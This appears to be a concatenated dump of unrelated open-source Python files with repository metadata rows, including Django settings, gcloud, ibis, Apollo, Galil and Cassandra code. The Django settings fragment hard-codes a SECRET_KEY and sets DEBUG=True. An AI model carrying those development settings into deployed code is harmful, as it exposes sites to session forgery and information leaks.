PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd8&u=e=t2&3qdmj^eq*!+r^79sske#)2uul@4i98jhb)z*alsk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sigma_nu.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
            r'C:\Users\hightower\Desktop\Sigma Nu\SIgma-Nu-idea-1'
            # TODO: update this path when deployed
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sigma_nu.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | -8,023,671,557,027,920,000 | 25.76 | 91 | 0.686398 | false |
lahosken/pants | src/python/pants/core_tasks/what_changed.py | 1 | 2061 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.base.deprecated import deprecated
from pants.scm.subsystems.changed import Changed
from pants.task.console_task import ConsoleTask
# TODO: Remove this entire file in 1.5.0dev0.
class WhatChanged(ConsoleTask):
"""Emits the targets that have been modified since a given commit."""
@classmethod
def register_options(cls, register):
super(WhatChanged, cls).register_options(register)
# N.B. The bulk of options relevant to this task now come from the `Changed` subsystem.
register('--files', type=bool, removal_version='1.5.0dev0',
help='Show changed files instead of the targets that own them.',
removal_hint='Use your scm implementation (e.g. `git diff --stat`) instead.')
@classmethod
def subsystem_dependencies(cls):
return super(WhatChanged, cls).subsystem_dependencies() + (Changed.Factory,)
@deprecated('1.5.0dev0', 'Use e.g. `./pants --changed-parent=HEAD list` instead.',
'`./pants changed`')
def console_output(self, _):
# N.B. This task shares an options scope ('changed') with the `Changed` subsystem.
options = self.get_options()
changed = Changed.Factory.global_instance().create(options)
change_calculator = changed.change_calculator(
build_graph=self.context.build_graph,
address_mapper=self.context.address_mapper,
scm=self.context.scm,
workspace=self.context.workspace,
# N.B. `exclude_target_regexp` is a global scope option registered elsewhere.
exclude_target_regexp=options.exclude_target_regexp
)
if options.files:
for f in sorted(change_calculator.changed_files()):
yield f
else:
for addr in sorted(change_calculator.changed_target_addresses()):
yield addr.spec
| apache-2.0 | -6,841,545,234,120,318,000 | 41.061224 | 93 | 0.700631 | false |
flgiordano/netcash | +/google-cloud-sdk/lib/surface/dns/managed_zones/create.py | 1 | 2431 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""gcloud dns managed-zone create command."""
from googlecloudsdk.api_lib.dns import util
from googlecloudsdk.calliope import base
from googlecloudsdk.core import list_printer
from googlecloudsdk.core import log
class Create(base.Command):
"""Create a Cloud DNS managed-zone.
This command creates a Cloud DNS managed-zone.
"""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': """\
To create a managed-zone, run:
$ {command} my_zone --dns_name my.zone.com. --description "My zone!"
""",
}
@staticmethod
def Args(parser):
parser.add_argument('dns_zone',
metavar='ZONE_NAME',
help='Name of the managed-zone to be created.')
parser.add_argument(
'--dns-name',
required=True,
help='The DNS name suffix that will be managed with the created zone.')
parser.add_argument('--description',
required=True,
help='Short description for the managed-zone.')
@util.HandleHttpError
def Run(self, args):
dns = self.context['dns_client']
messages = self.context['dns_messages']
resources = self.context['dns_resources']
zone_ref = resources.Parse(args.dns_zone, collection='dns.managedZones')
zone = messages.ManagedZone(name=zone_ref.managedZone,
dnsName=util.AppendTrailingDot(args.dns_name),
description=args.description)
result = dns.managedZones.Create(
messages.DnsManagedZonesCreateRequest(managedZone=zone,
project=zone_ref.project))
log.CreatedResource(zone_ref)
return result
def Display(self, args, result):
list_printer.PrintResourceList('dns.managedZones', [result])
| bsd-3-clause | 7,825,775,985,124,091,000 | 34.231884 | 80 | 0.65364 | false |
cpcloud/ibis | ibis/expr/tests/test_schema.py | 1 | 4977 | import ibis
from ibis.expr import datatypes as dt
def test_whole_schema():
customers = ibis.table(
[
('cid', 'int64'),
('mktsegment', 'string'),
(
'address',
(
'struct<city: string, street: string, '
'street_number: int32, zip: int16>'
),
),
('phone_numbers', 'array<string>'),
(
'orders',
"""array<struct<
oid: int64,
status: string,
totalprice: decimal(12, 2),
order_date: string,
items: array<struct<
iid: int64,
name: string,
price: decimal(12, 2),
discount_perc: decimal(12, 2),
shipdate: string
>>
>>""",
),
(
'web_visits',
(
'map<string, struct<user_agent: string, '
'client_ip: string, visit_date: string, '
'duration_ms: int32>>'
),
),
(
'support_calls',
(
'array<struct<agent_id: int64, '
'call_date: string, duration_ms: int64, '
'issue_resolved: boolean, '
'agent_comment: string>>'
),
),
],
name='customers',
)
expected = ibis.Schema.from_tuples(
[
('cid', dt.int64),
('mktsegment', dt.string),
(
'address',
dt.Struct.from_tuples(
[
('city', dt.string),
('street', dt.string),
('street_number', dt.int32),
('zip', dt.int16),
]
),
),
('phone_numbers', dt.Array(dt.string)),
(
'orders',
dt.Array(
dt.Struct.from_tuples(
[
('oid', dt.int64),
('status', dt.string),
('totalprice', dt.Decimal(12, 2)),
('order_date', dt.string),
(
'items',
dt.Array(
dt.Struct.from_tuples(
[
('iid', dt.int64),
('name', dt.string),
('price', dt.Decimal(12, 2)),
(
'discount_perc',
dt.Decimal(12, 2),
),
('shipdate', dt.string),
]
)
),
),
]
)
),
),
(
'web_visits',
dt.Map(
dt.string,
dt.Struct.from_tuples(
[
('user_agent', dt.string),
('client_ip', dt.string),
('visit_date', dt.string),
('duration_ms', dt.int32),
]
),
),
),
(
'support_calls',
dt.Array(
dt.Struct.from_tuples(
[
('agent_id', dt.int64),
('call_date', dt.string),
('duration_ms', dt.int64),
('issue_resolved', dt.boolean),
('agent_comment', dt.string),
]
)
),
),
]
)
assert customers.schema() == expected
def test_schema_subset():
s1 = ibis.schema([('a', dt.int64), ('b', dt.int32), ('c', dt.string)])
s2 = ibis.schema([('a', dt.int64), ('c', dt.string)])
assert s1 > s2
assert s2 < s1
assert s1 >= s2
assert s2 <= s1
def test_empty_schema():
schema = ibis.schema([])
result = repr(schema)
expected = """\
ibis.Schema {
}"""
assert result == expected
| apache-2.0 | -8,713,466,511,553,539,000 | 31.960265 | 74 | 0.277275 | false |
Lao-liu/mist.io | setup.py | 1 | 1324 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = []
setup(name='mist.io',
version='0.9.9',
license='AGPLv3',
description='server management, monitoring & automation across clouds from any web device',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pylons",
"Topic :: Internet :: WWW/HTTP",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='mist.io',
author_email='[email protected]',
url='https://mist.io',
keywords='web cloud server management monitoring automation mobile libcloud pyramid amazon aws rackspace openstack linode softlayer digitalocean gce',
packages=find_packages('src'),
package_dir={'': 'src'},
namespace_packages=['mist'],
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="mist.io",
entry_points="""\
[paste.app_factory]
main = mist.io:main
""",
)
| agpl-3.0 | 4,312,459,541,311,082,000 | 32.948718 | 156 | 0.624622 | false |
edunham/toys | pd/resolve.py | 1 | 1132 | #!/usr/bin/env python3
# based on example from https://github.com/PagerDuty/API_Python_Examples/tree/master/EVENTS_API_v2
import json
import requests
import os
import sys
ROUTING_KEY = os.environ['PAGERDUTY_SERVICE_KEY']
INCIDENT_KEY = sys.argv[1]
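# Usage sketch (illustrative): export the routing key and pass the dedup key
# of the incident to resolve, e.g.
#   PAGERDUTY_SERVICE_KEY=<routing-key> ./resolve.py <dedup-key>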
def resolve_incident():
    # Resolves a PagerDuty incident using the dedup key of a previously triggered incident
# Uses Events V2 API - documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
header = {
"Content-Type": "application/json"
}
    payload = { # Payload is built with the least amount of fields required to resolve an incident
"routing_key": ROUTING_KEY,
"event_action": "resolve",
"dedup_key": INCIDENT_KEY
}
response = requests.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
if response.json()["status"] == "success":
print('Incident Resolved ')
else:
print(response.text) # print error message if not successful
if __name__ == '__main__':
resolve_incident()
| mit | 1,053,160,661,838,398,100 | 28.789474 | 109 | 0.64576 | false |
nditech/elections | apollo/locations/__init__.py | 1 | 4175 | from apollo.core import Service, cache
from apollo.locations.models import Sample, LocationType, Location
import unicodecsv
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
class SamplesService(Service):
__model__ = Sample
class LocationTypesService(Service):
__model__ = LocationType
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
class LocationsService(Service):
__model__ = Location
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
@cache.memoize(timeout=86400)
def registered_voters_map(self):
'''
This method computes a map of location ids and the corresponding
        number of registered voters and caches the result for a day.
'''
eligible_location_types = LocationTypesService().find(
has_registered_voters=True).scalar('name')
return {pk: rv for (pk, rv) in self.find(
location_type__in=eligible_location_types).scalar(
'pk', 'registered_voters')}
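    # Illustrative usage sketch (assumes the no-argument service construction
    # used elsewhere in this module):
    #   rv_map = LocationsService().registered_voters_map()
    #   total_registered = sum(rv_map.values())
    # The mapping is cached for a day (timeout=86400 above), so repeated
    # aggregations avoid re-querying every location.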
def export_list(self, queryset):
headers = []
location_types = list(LocationTypesService().find().order_by(
'ancestors_ref'))
for location_type in location_types:
location_name = location_type.name.upper()
headers.append('{}_N'.format(location_name))
headers.append('{}_ID'.format(location_name))
if location_type.has_political_code:
headers.append('{}_PCODE'.format(location_name))
if location_type.has_registered_voters:
headers.append('{}_RV'.format(location_name))
for metafield in location_type.metafields:
headers.append('{}_{}'.format(
location_name, metafield.upper()
))
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in headers])
yield output.getvalue()
output.close()
if queryset.count() < 1:
yield
else:
locations = queryset
locations = locations.order_by('code')
for location in locations:
record = []
for location_type in location_types:
try:
this_location = filter(
lambda l: l.location_type == location_type.name,
location.ancestors_ref
).pop()
except IndexError:
if location.location_type == location_type.name:
this_location = location
else:
this_location = None
record.append(this_location.name or ''
if this_location else '')
record.append(this_location.code or ''
if this_location else '')
if location_type.has_political_code:
record.append(this_location.political_code or ''
if this_location else '')
if location_type.has_registered_voters:
record.append(this_location.registered_voters or ''
if this_location else '')
for metafield in location_type.metafields:
record.append(getattr(this_location, metafield, '')
if this_location else '')
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in record])
yield output.getvalue()
output.close()
| gpl-3.0 | 3,217,432,549,554,864,600 | 39.144231 | 76 | 0.535329 | false |
mehdy/click-pug | tehpug.py | 1 | 2029 | # coding: utf-8
#
# ==========================================
# Developed by Mehdy Khoshnoody =
# Contact @ [email protected] =
# More info @ http://mehdy.net =
# ==========================================
#
__author__ = 'mehdy'
import click
def version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo('version 1.0')
ctx.exit()
def validate(ctx, param, value):
    if value < 18:
        click.echo('You are not authorized to attend. You must be at least 18.')
ctx.exit()
else:
return
@click.group()
@click.option('--version', callback=version, expose_value=False, is_flag=True, is_eager=True)
def main():
'''
    This is a detail section for the app
'''
pass
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, callback=validate, help='enter your age')
@click.option('--attend/--not-attend', default=False)
@click.argument('out', type=click.File('w'), required=False)
@click.option('--group', type=click.Choice(['flask','django','click']), default='flask')
def pug(name, age, attend, out, group):
'''
    this is a help message for pug
'''
if out:
if not attend:
click.echo('Why???', out)
click.echo('hello %s, you are %s years old.\nwelcome to PUG' %(name, age), out)
click.echo('you are member of %s subgroup in pug.' %group, out)
else:
if not attend:
click.echo('Why???')
click.echo('hello %s, you are %s years old.\nwelcome to PUG' % (name, age))
click.echo('you are member of %s subgroup in pug.' % group)
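# Example invocation (illustrative):
#   python tehpug.py pug --name mehdy --age 20 --attend --group click
# An optional OUT file argument redirects the messages to that file instead of
# the terminal.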
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, help='enter your age')
def lug(name, age):
'''
and a help message for lug
'''
click.echo('hello %s, you are %s years old.\nwelcome to LUG' %(name, age)) | gpl-2.0 | -5,895,680,206,538,094,000 | 31.222222 | 93 | 0.580089 | false |
brownnrl/moneyguru | core/tests/gui/tree_test.py | 1 | 3347 | # Copyright 2018 Virgil Dupras
#
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html
from core.tests.testutil import eq_
from core.gui.tree import Tree, Node
def tree_with_some_nodes():
t = Tree()
t.append(Node('foo'))
t.append(Node('bar'))
t.append(Node('baz'))
t[0].append(Node('sub1'))
t[0].append(Node('sub2'))
return t
def test_selection():
t = tree_with_some_nodes()
assert t.selected_node is None
eq_(t.selected_nodes, [])
assert t.selected_path is None
eq_(t.selected_paths, [])
def test_select_one_node():
t = tree_with_some_nodes()
t.selected_node = t[0][0]
assert t.selected_node is t[0][0]
eq_(t.selected_nodes, [t[0][0]])
eq_(t.selected_path, [0, 0])
eq_(t.selected_paths, [[0, 0]])
def test_select_one_path():
t = tree_with_some_nodes()
t.selected_path = [0, 1]
assert t.selected_node is t[0][1]
def test_select_multiple_nodes():
t = tree_with_some_nodes()
t.selected_nodes = [t[0], t[1]]
eq_(t.selected_paths, [[0], [1]])
def test_select_multiple_paths():
t = tree_with_some_nodes()
t.selected_paths = [[0], [1]]
eq_(t.selected_nodes, [t[0], t[1]])
def test_select_none_path():
# setting selected_path to None clears the selection
t = Tree()
t.selected_path = None
assert t.selected_path is None
def test_select_none_node():
# setting selected_node to None clears the selection
t = Tree()
t.selected_node = None
eq_(t.selected_nodes, [])
def test_clear_removes_selection():
# When clearing a tree, we want to clear the selection as well or else we end up with a crash
# when calling selected_paths.
t = tree_with_some_nodes()
t.selected_path = [0]
t.clear()
assert t.selected_node is None
def test_selection_override():
# All selection changed pass through the _select_node() method so it's easy for subclasses to
# customize the tree's behavior.
class MyTree(Tree):
called = False
def _select_nodes(self, nodes):
self.called = True
t = MyTree()
t.selected_paths = []
assert t.called
t.called = False
t.selected_node = None
assert t.called
def test_findall():
t = tree_with_some_nodes()
r = t.findall(lambda n: n.name.startswith('sub'))
eq_(set(r), set([t[0][0], t[0][1]]))
def test_findall_dont_include_self():
# When calling findall with include_self=False, the node itself is never evaluated.
t = tree_with_some_nodes()
del t._name # so that if the predicate is called on `t`, we crash
r = t.findall(lambda n: not n.name.startswith('sub'), include_self=False) # no crash
eq_(set(r), set([t[0], t[1], t[2]]))
def test_find_dont_include_self():
# When calling find with include_self=False, the node itself is never evaluated.
t = tree_with_some_nodes()
del t._name # so that if the predicate is called on `t`, we crash
r = t.find(lambda n: not n.name.startswith('sub'), include_self=False) # no crash
assert r is t[0]
def test_find_none():
# when find() yields no result, return None
t = Tree()
assert t.find(lambda n: False) is None # no StopIteration exception
| gpl-3.0 | 9,161,680,050,084,443,000 | 30.280374 | 97 | 0.638781 | false |
duelafn/python-galil-apci | galil_apci/file.py | 1 | 15100 | # -*- coding: utf-8 -*-
"""Simple galil file templating and minification
Preforms useful actions on galil encoder files.
- Substitution of template variables (using jinja2)
- Whitespace trimming and minification by command packing
"""
# Author: Dean Serenevy <[email protected]>
# This software is Copyright (c) 2013 APCI, LLC.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, absolute_import, print_function
import re
import logging
logger = logging.getLogger(__name__)
import galil_apci
import jinja2
import collections
from jinja2_apci import RequireExtension, RaiseExtension
import math
axis2idx = { "A": 0, "B": 1, "C": 2, "D": 3,
"E": 4, "F": 5, "G": 6, "H": 7,
"X": 0, "Y": 1, "Z": 2, "W": 3
}
def param_list(params):
"""
Produces string appropriate for a galil parameter list for a set of axes.
Setting a number of values at once sometimes requires issuing a command
with a single positional list of values for each axis. For example::
JG val1,val2,...
This can be difficult if the axis numbers are parameters. This function
will produce a list from a dictionary of axes (numerical or letters)::
JG{{ param_list({ "A": 60*4096, "B": 60*4096 }) }}
JG{{ param_list({ "0": 60*4096, "1": 60*4096 }) }}
JG{{ param_list({ primary.axis: "^a*" ~ primary.counts, secondary.axis: "^a*" ~ secondary.counts }) }}
"""
a = [""] * 8
for (k, v) in params.iteritems():
a[int(axis2idx.get(k, k))] = str(v)
i = 7
while i >= 0:
if a[i] == '':
i -= 1
else:
break
if i < 0:
raise Exception("No values in the parameter list: {}".format(str(params)))
return ",".join(a[0:i+1])
def build_commander(fmt):
"""
Convenience method which constructs list of formatted commands when
passed a list of arguments.
E.g.,::
HX = build_commander("HX{}")
print( HX(1,2,3) ) # prints HX1;HX2;HX3
"""
def cmd(*args):
return ";".join([ fmt.format(x) for x in args ])
return cmd
def sin(theta):
"""sin function taking degree arguments"""
return math.sin(math.pi * theta/180)
def asin(h):
"""asin function returning degrees"""
return 180 * math.asin(h) / math.pi
def cos(theta):
"""cos function taking degree arguments"""
return math.cos(math.pi * theta/180)
def acos(h):
"""acos function returning degrees"""
return 180 * math.acos(h) / math.pi
class GalilFile(object):
@classmethod
def add_globals(cls, g):
g["string_to_galil_hex"] = galil_apci.Galil.string_to_galil_hex
g["galil_hex_to_string"] = galil_apci.Galil.galil_hex_to_string
g["galil_hex_to_binary"] = galil_apci.Galil.galil_hex_to_binary
g["round_galil"] = galil_apci.Galil.round
g["axis2idx"] = axis2idx
g["param_list"] = param_list
g["HX"] = build_commander("HX{}")
g["SB"] = build_commander("SB{}")
g["CB"] = build_commander("CB{}")
g["max"] = max
g["min"] = min
g["int"] = int
g["sin"] = sin
g["asin"] = asin
g["cos"] = cos
g["acos"] = acos
def __init__(self, path=None, package=None, line_length=79):
"""
@param path: If a path (array of directories) is provided, it will
be prepended to the template search path. The default path is
the "gal" folder in the apci module directory.
@param line_length: Galil maximum line length. 79 for most boards,
but some are capped at 39.
"""
self.line_length = line_length
loaders = []
if path:
loaders.append(jinja2.FileSystemLoader(path, encoding='utf-8'))
if package:
loaders.append(jinja2.PackageLoader(package, 'gal', encoding='utf-8'))
def finalize(value):
if value is None:
print("Use of undefined value in template!")
return "None"
else:
return value
self.env = jinja2.Environment(
extensions=[RequireExtension, RaiseExtension],
loader=jinja2.ChoiceLoader(loaders),
undefined=jinja2.StrictUndefined,
finalize=finalize,
)
GalilFile.add_globals(self.env.globals)
def load(self, name, context):
"""Renders and minifies a template"""
return self.minify( self.render(name, context) )
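    # Illustrative usage sketch (the template name and context keys are
    # hypothetical, not part of this module):
    #   gf = GalilFile(path=["/opt/galil/templates"], line_length=79)
    #   code = gf.load("homing.gal", {"axis": "A"})
    #   problems = gf.lint(code, warnings=True)  # empty list when clean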
def lint(self, content, warnings=False):
"""
Performs a lint check on the galil code
- long lines, too-long strings
        - duplicate labels / C{JS} or C{JP} to non-existent labels
- C{_JS} or C{()} used in sub argument, inconsistent sub arity
- Double equals ("=="), Not equals ("!=")
- presence of "None" anywhere in the code
- [warning] unused labels
NOT IMPLEMENTED / TODO:
- long variable names
- external JP targets
- C{SHA}, C{_GRB}, ... (axes outside of braces, should be C{SHE{lb}E{lb}AE{rb}E{rb}} and C{_GRE{lb}E{lb}BE{rb}E{rb}})
- uninitialized variables (variables not initialized in any #xxINIT)
"""
content = self.minify(content)
errors = []
# WARNING: Any trailing semicolon/EOL checks need to be zero-width assertions
p_sub_def = re.compile(r"(?:^|;)(#[a-zA-Z0-9_]{1,7})")
p_sub_arg = re.compile(r"""
(?:^|;)
(?:J[SP]|XQ) (\#[a-zA-Z0-9_]{1,7}) # jump name
((?:\(.*?\))?) # optional arguments
(?= ; | $ # endl
| , \( # complex condition
| , (?:\d+|\^[a-h]|\w{1,8}) (?:;|$) # thread number
)
""", re.X)
p_bad_ops = re.compile(r"(?:==|!=)")
p_JS = re.compile(r"_JS")
p_if_js = re.compile(r"(?:^|;)IF\([^;\n]+\)[;\n](J[SP]#[a-zA-Z]+)[^;\n]*[;\n]ENDIF", re.M)
# Dangerous to have any calculation in an argument. Only want variables.
# warning: won't catch @ABS[foo]
p_danger_arg = re.compile(r"(?:.(?:\(|\)).|[^a-zA-Z0-9.,@\[\]_\(\)\^\&\"\-]|(?<![\(,])\-)")
pc_MG = re.compile(r"^MG")
subs = set()
sub_line = {}
sub_arity = {}
sub_neg1_dflt = set(("#ok", "#error"))
AUTO_subs = set(["#AUTO", "#MCTIME", "#AMPERR", "#AUTOERR", "#POSERR", "#CMDERR"])
JSP_sub = set()
JSP_line = collections.defaultdict(list)
if warnings:
for jump in p_if_js.findall(content):
errors.append( "IF(...);{} better written as {},(...)".format(jump, jump) )
lineno = 0
for line in content.split("\n"):
lineno += 1
# presence of None
if "None" in line:
errors.append( "line {}, Contains 'None', check template vars: {}".format(lineno, line) )
# long lines
if len(line) > self.line_length:
errors.append( "line {}, Line too long: {}".format(lineno, line) )
# Bad operators
if p_bad_ops.search(line):
errors.append( "line {}, bad operator: {}".format(lineno, line) )
# for duplicate labels
for name in p_sub_def.findall(line):
if name in subs:
errors.append( "line {}, Duplicate label: {}".format(lineno, name) )
else:
subs.add(name)
sub_line[name] = lineno
# examine subroutine arguments (JS, JP)
            # also for unused labels and jumps to non-existent labels
for name, arg in p_sub_arg.findall(line):
# Note: arg includes "()"
JSP_sub.add(name)
JSP_line[name].append(lineno)
args = [] if len(arg) < 3 else arg.split(',')
if name in sub_neg1_dflt and arg == "(-1)":
# Make exception for #ok and #error
pass
elif name in sub_arity:
if len(args) != sub_arity[name]:
errors.append( "line {}, inconsistent sub arity for {}. Was {} now {}".format(lineno, name, sub_arity[name], len(args)) )
else:
sub_arity[name] = len(args)
if p_JS.search(arg):
errors.append( "line {}, _JS used in subroutine argument: {}".format(lineno, line) )
if p_danger_arg.search(arg):
errors.append( "line {}, Dangerous value (calculation) used in argument: {}".format(lineno, line) )
for cmd in line.split(";"):
# long strings
if not pc_MG.search(cmd):
strings = cmd.split('"')
for idx in (x for x in xrange(1, len(strings), 2) if len(strings[x]) > 5):
errors.append( "line {}, Long string '{}' in command: {}".format(lineno, strings[idx], cmd) )
        # jumps to non-existent labels
for sub in JSP_sub - subs:
errors.append( "line(s) {}, J[SP]{} found but label {} not defined".format(JSP_line[sub], sub, sub) )
if warnings:
# unused labels
for sub in subs - JSP_sub - AUTO_subs:
errors.append( "line {}, Label {} defined but never used".format(sub_line[sub], sub) )
return errors
def minify(self, content):
"""
Performs minification on a galil file. Actions performed:
- Strips all comments
- trims space after semicolon and before/after various ops (" = ", "IF (...)")
- Merges "simple" lines (up to line_length)
"""
lines = []
double_semi = re.compile(r';(\s*)(?=;)')
line_end_semi = re.compile(r';$')
# Comments: ', NO, REM. Do NOT need to check for word boundaries ("NOTE" is a comment)
#
# WARNING: This is INCORRECT! In galil a semicolon ends a comment
# - this is crazy so I explicitly choose to have a comment kill
# the rest of the line
comment = re.compile(r"(?:^|;)\s*(?:'|NO|REM).*")
# Operators with wrapped space. Match will be replaced with \1.
operator_spaces = re.compile(r"\s*([,;=\+\-*/%<>\(\)\[\]&|]|<>|>=|<=)\s*")
# A line containing just a label
label_line = re.compile(r"^#[a-zA-Z0-9]{1,7}$")
# A line that starts with a label
label_start = re.compile(r"^#")
# Joinable Lines (combinations of the following):
# - Simple Assignments: assignments to our variables or arrays (start with lower)
# - ENDIF, ELSE
# NOTE: a joinable line never ends in a semicolon - this provides a way to force a line break
joinable_line = re.compile(r"""
^(?: (?:^|;) \s*
(?:
(?:[~^][a-z]|[a-z][a-zA-Z0-9]{0,7}(?:\[[^\];]+\])?)
\s* = \s* [^\;]+
| ENDIF
| ELSE
)
\s*)+$
""", re.X)
_lines1 = []
# Start with simple compaction (removes extra garbage and makes
# later length calculations more reliable
for line in content.split("\n"):
line = re.sub(comment, '', line)
line = re.sub(operator_spaces, '\\1', line)
line = line.strip()
if len(line):
_lines1.append(line)
# The more advanced stuff: line merging, etc
i = 0
_lines2 = []
while i < len(_lines1):
line = _lines1[i]
while ( i < len(_lines1) - 1
and joinable_line.match(_lines1[i+1])
and self.line_length > len(line + ";" + _lines1[i+1])
):
line = line + ";" + _lines1[i+1]
i += 1
if len(line):
_lines2.append(line)
i += 1
# Squash label into next line (assuming it isn't itself a label)
i = 0
while i < len(_lines2):
line = _lines2[i]
if ( i < len(_lines2) - 1
and label_line.match(line)
and not label_start.match(_lines2[i+1])
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
if ( i < len(_lines2) - 1
and _lines2[i+1] == 'EN'
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
# double semicolons confuse galil but are somewhat easy to
# introduce when templating and doing strange minification.
# Strip them out again just to be sure:
line = line_end_semi.sub('',(double_semi.sub(r'\1',line)))
if len(line):
lines.append(line)
i += 1
for i, line in enumerate(lines):
if (len(line) > self.line_length):
logger.error("Long line '%s' in minified galil output", line)
return "\n".join(lines)
def trim(self, content):
"""
Performs whitespace trimming on a galil file.
"""
lines = []
for line in content.split("\n"):
line = line.strip()
if len(line):
lines.append(line)
return "\n".join(lines)
def render(self, name, context):
"""
Renders a galil template file (substitutes variables and expands
inclusions), but does not perform whitespace trimming or
minification.
"""
content = self.env.get_template(name).render(context)
# double semicolons confuse galil but are somewhat easy to
# introduce when templating. Strip them out here:
return re.sub(r';(\s*)(?=;)', r'\1', content).encode('utf-8')
def get_template(self, name):
"""
Gets the jinja template object for a template file.
"""
return self.env.get_template(name)
| lgpl-3.0 | 4,899,683,945,039,046,000 | 34.6974 | 145 | 0.515762 | false |
kishkaru/python-driver | cassandra/cluster.py | 1 | 149094 | # Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module houses the main classes you will interact with,
:class:`.Cluster` and :class:`.Session`.
"""
from __future__ import absolute_import
import atexit
from collections import defaultdict, Mapping
from concurrent.futures import ThreadPoolExecutor
import logging
from random import random
import socket
import sys
import time
from threading import Lock, RLock, Thread, Event
import six
from six.moves import range
from six.moves import queue as Queue
import weakref
from weakref import WeakValueDictionary
try:
from weakref import WeakSet
except ImportError:
from cassandra.util import WeakSet # NOQA
from functools import partial, wraps
from itertools import groupby, count
from cassandra import (ConsistencyLevel, AuthenticationFailed,
